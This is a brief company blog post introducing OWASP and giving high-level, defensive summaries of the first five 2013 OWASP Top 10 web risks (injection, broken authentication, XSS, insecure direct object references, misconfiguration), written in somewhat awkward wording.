OWASP Top 10 - 2013
In this day and age, insecure software is one of the single biggest threats to our way of life. Diffident configurations of software can undermine our financial, energy, defense, healthcare, and basically any other critical infrastructure. As our digital framework becomes increasingly complex, the trouble of achieving application security increases exponentially. Luckily, organizations like the Open Web Application Security Project (OWASP for short) help raise awareness by identifying the most critical risks facing organizations today. At Clarity, we will examine how OWASP impacts our community and explain how you can benefit.
What is OWASP?
The Open Web Application Security Project is a non-profit organization devoted to improving the security of software. This open community is dedicated to enable organizations to develop, purchase, and maintain trustworthy applications. OWASP provides application security standards, cutting edge research, and a plethora of informative tools to help strengthen software operations.
OWASP Top 10
In 2013, OWASP updated their Top 10 project in hopes of enlightening technology leaders to become conscious of the latest web vulnerabilities. These software susceptibilities evolve over time as delinquents become smarter and tools change. Below are the Top 10 web exposures that could be impacting your business.
Untrusted data can have negative ramifications if not addressed appropriately. Injection flaws, such as SQL, OS, and LDAP injection occur when insecure data is delivered to an interpreter as part of a command or query. The attacker’s hostile data can hoax the translator into performing unintended commands or accessing data without proper authorization.
2) Broken Authentication and Session Management
Application functions related to authentication and session management are often implemented incorrectly, allowing invaders to compromise passwords, keystrokes, session tokens, or to exploit other implementation flaws to assume other users’ identities.
3) Cross-Site Scripting (XSS)
XSS flaws occur whenever an application takes untrusted data and relays it to a web browser without proper validation. XSS allows attackers to execute scripts in the victim’s browser which can steal user sessions, deface web sites, and redirect the user to malicious sites.
4) Insecure Direct Object References
A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.
5) Security Misconfiguration
Great security requires having a protected configuration defined and deployed for not only the application, but the frameworks, application server, web server, database server, and platform. Secure settings must be defined, implemented, and maintained, as defaults are frequently insecure. Additionally, software should update regularly.
Learn the top 6-10 vulnerabilities and how you can strengthen your organization.